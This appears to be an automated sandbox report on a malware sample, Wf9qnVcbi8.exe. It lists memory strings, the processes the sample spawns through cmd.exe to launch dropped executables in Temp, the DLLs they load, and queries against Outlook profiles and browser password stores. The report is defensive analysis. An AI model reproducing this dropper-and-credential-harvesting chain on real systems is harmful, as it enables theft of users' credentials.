Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2227149641.000000006C77F000.00000002.00000001.01000000.00000007.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Wf9qnVcbi8.exe, 00000000.00000003.2074456212.00000000233C8000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000003.2054865895.00000000233D4000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000003.2054865338.00000000016C2000.00000004.00000020.00020000.00000000.sdmp, GCGHJEBGHJKEBFHIJDHC.0.dr, KJDGIJECFIEBFIDHCGHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226667340.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Wf9qnVcbi8.exe Virustotal: Detection: 45%
Source: IDGHDGIDAK.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File read: C:\Users\user\Desktop\Wf9qnVcbi8.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Wf9qnVcbi8.exe "C:\Users\user\Desktop\Wf9qnVcbi8.exe"
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe"
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe"
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFHDHIJDGC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe "C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe "C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe" Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: Wf9qnVcbi8.exe Static file information: File size 2514944 > 1048576
Source: Wf9qnVcbi8.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x222c00
